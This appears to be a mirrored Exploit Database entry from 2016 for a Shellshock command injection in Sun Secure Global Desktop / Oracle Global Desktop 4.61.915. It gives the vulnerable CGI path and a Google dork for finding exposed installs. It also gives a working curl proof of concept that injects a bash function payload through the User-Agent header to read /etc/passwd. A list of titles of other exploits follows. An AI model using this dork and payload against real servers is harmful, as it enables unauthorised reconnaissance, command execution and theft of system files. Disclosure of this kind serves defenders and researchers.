Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 – Command Injection (Shellshock)

Exploit Database
18 阅读

作者： lastc0de

日期： 2016-06-06
类别：
- webapps
平台：
- cgi
来源：https://www.exploit-db.com/exploits/39887/

# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client
# Date: 6/4/2016
# Exploit Author: lastc0de@outlook.com
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html
# Version: 4.61.915
# Tested on: Linux

VULNERABLE FILE
http://target.com//tarantella/cgi-bin/modules.cgi

POC :
localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt

localhost@~#cat xixixi.txt
which will print out the content of /etc/passwd file.

last Exploits
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 – Command Injection (Shellshock)的更多信息

Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 – Multiple Vulnerabilities：
WordPress Plugin Inline Gallery 0.3.9 – ‘do’ Cross-Site Scripting：
NodeBB Forum 1.12.2-1.14.2 – Account Takeover：
Minify 2.1.x – ‘g’ Cross-Site Scripting：
Syneto Unified Threat Management 1.3.3/1.4.2 – Multiple Cross-Site Scripting / HTML Injection Vulnerabilities：
Bonefire 0.7.1 – Reinstall Admin Account：
School ERP Pro+Responsive 1.0 – Arbitrary File Download：
DASAN Zhone ZNID GPON 2426A EU – Multiple Cross-Site Scripting：